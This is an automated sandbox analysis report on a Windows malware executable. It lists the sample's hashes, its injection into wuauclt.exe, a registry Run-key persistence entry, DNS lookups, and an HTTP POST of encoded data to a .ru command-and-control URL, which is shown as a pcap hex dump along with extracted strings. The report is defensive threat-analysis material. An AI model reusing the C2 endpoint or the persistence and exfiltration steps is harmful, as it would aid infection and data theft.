Analysis Date2014-10-02 00:29:47
MD5b49a7788464d328ee902d6d5e8b1ebc9
SHA13a09957ca6555860055829b1156df46d9630d974

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\system32\wuauclt.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
C:\Documents and Settings\All Users\Local Settings\Temp\msyqaaq.com\\x00
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\All Users\Local Settings\Temp\msyqaaq.com
Deletes FileC:\3A0995~1.EXE
Creates Mutex3227095050

Network Details:

DNSwww.update.microsoft.com.nsatc.net
Type: A
134.170.0.157
DNSwww.update.microsoft.com.nsatc.net
Type: A
157.56.107.155
DNSmkjjkez-sy.ru
Type: A
144.76.144.27
DNSwww.update.microsoft.com
Type: A
HTTP POSThttp://mkjjkez-sy.ru/andro/image.php
User-Agent: Mozilla/4.0
Flows TCP192.168.1.1:1031 ➝ 134.170.0.157:80
Flows UDP192.168.1.1:1032 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1033 ➝ 144.76.144.27:80

Raw Pcap
0x00000000 (00000)   504f5354 202f616e 64726f2f 696d6167   POST /andro/imag
0x00000010 (00016)   652e7068 70204854 54502f31 2e310d0a   e.php HTTP/1.1..
0x00000020 (00032)   486f7374 3a206d6b 6a6a6b65 7a2d7379   Host: mkjjkez-sy
0x00000030 (00048)   2e72750d 0a557365 722d4167 656e743a   .ru..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 0d0a436f    Mozilla/4.0..Co
0x00000050 (00080)   6e74656e 742d5479 70653a20 6170706c   ntent-Type: appl
0x00000060 (00096)   69636174 696f6e2f 782d7777 772d666f   ication/x-www-fo
0x00000070 (00112)   726d2d75 726c656e 636f6465 640d0a43   rm-urlencoded..C
0x00000080 (00128)   6f6e7465 6e742d4c 656e6774 683a2038   ontent-Length: 8
0x00000090 (00144)   380d0a43 6f6e6e65 6374696f 6e3a2063   8..Connection: c
0x000000a0 (00160)   6c6f7365 0d0a0d0a 66484741 54384133   lose....fHGAT8A3
0x000000b0 (00176)   2b6a6e65 6e435231 31717275 416a375a   +jnenCR11qruAj7Z
0x000000c0 (00192)   524c7843 4f316137 38324877 79535748   RLxCO1a782HwySWH
0x000000d0 (00208)   6f584e36 2b556648 57743635 586a6341   oXN6+UfHWt65XjcA
0x000000e0 (00224)   7662446e 50776b78 4a386772 6f513675   vbDnPwkxJ8groQ6u
0x000000f0 (00240)   4d67475a 6f6e6d66 48582b6b 6b766761   MgGZonmfHX+kkvga
0x00000100 (00256)                                         


Strings
....
...

$.>(
040904B0
2.01.0001
2&'2
!4YE
About 
*\AD:\8898799O87\tutu.vbp
CompanyName
Create a text file named 
`Ct`kfKylgjGx`kfKxlj
dxjw1
edfvtghjui
FileVersion
 file was not found? 
fkaS
G0Gv
iAsHB
InternalName
ltl4
MiUfV
M)kV[QcV[Q
MSINFO
\MSINFO32.EXE
Options
OriginalFilename
PATH
ProductName
ProductVersion
QV1OS
Show Tips at Startup
SOFTWARE\Microsoft\Shared Tools Location
SOFTWARE\Microsoft\Shared Tools\MSINFO
SRsAT
StringFileInfo
@struct
System Information Is Unavailable At This Time
That the 
Then place it in the same directory as the application. 
TIPOFDAY.TXT
Translation
ujnyhbtgvf
\Users
 using NotePad with 1 tip per line. 
VarFileInfo
vbII.10-2702.2000
vbII.10-2702.2000.exe
Version 
VS_VERSION_INFO
y7Wo
0000C0gyuhnj
20548488848494848989
{205484888484948489892.W
2054848884849484898978765567hgr012350k414oo5420548488848494848989ID
2702.2
(;4iAx
a7Rmq-
About MyApp
advapi32
App Description
Application Title
B2F4/*PX
>B7a^^\SOII
c@6(V!!VVT,
CallWindowProcW
chkLoadTipsAtStartup
CloseHandle
cmdNextTip
cmdSysInfo
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
CreateFileW
`.data
Did you know...
DisplayCurrentTip
DllFunctionCall
drfcvbghu
e;1>.00*($$$$
/EjAw"
EVENT_SINK_AddRef
EVENT_SINK_QueryInterface
EVENT_SINK_Release
F9)xTx9
frmAbout
frmTip
F:)yV<
GetKeyValue
GetModuleFileNameA
gyuhnj
	}h%JA
/h^jXT
iiNZXXXXTTTP////T
iVaa*m
iW`M`VWMWZKMKK7G70*0%79<9
kernel32
kernel32.dll
kerNel32.dll
KeyName
KeyRoot
KeyVal
Label1
lblDescription
lblDisclaimer
lblTipText
lblTitle
lblVersion
LoadLibraryW
LoadTips
MethCallEngine
MHO8|%
m{-QQ1
MSVBVM60.DLL
 MUt~R
&Next Tip
"'+[Nf
NNNNNNNNN)
n'?,&q
oooo0a
OpenProcess
picIcon
Picture1
pooo0a
ProcCallEngine
Process32First
Process32Next
q1YmZ4
-QCoIA
ReadFile
RegCloseKey
RegOpenKeyExA
RegQueryValueExA
rvrvoop[[[<<<<:::L49
&Show Tips at Startup
@?SiW:4
StartSysInfo
SubKeyRef
&System Info...
SystemParametersInfoA
TerminateProcess
!This program cannot be run in DOS mode.
Tip of the Day
t~|:Si
ttttt<|
U2?_ E
U4Qkh-
u		Hd@y
U'Qkd,
(*}uqn\
USER32
user32.dll
USER32.DLL
UU\}|p
<V91N^_
VBA6.DLL
__vbaExceptHandler
vbII.10-2702.2000
Version
&v*zhv
Warning: ...
wwwwwwp
wwwwwwW
wwWXwX
wXwxxwuuuw
XsmmppppppppppmC
xuuuewWwVWWw
xwuwuw
xwwxwWwW
||||xxpU
xxWwPw
xxxr0,
xXxxww|u}w
<yY"rq
}}yyyyvv|U
Z8C"gz{1
zhn"<Ff)Qy
/z_\W",AX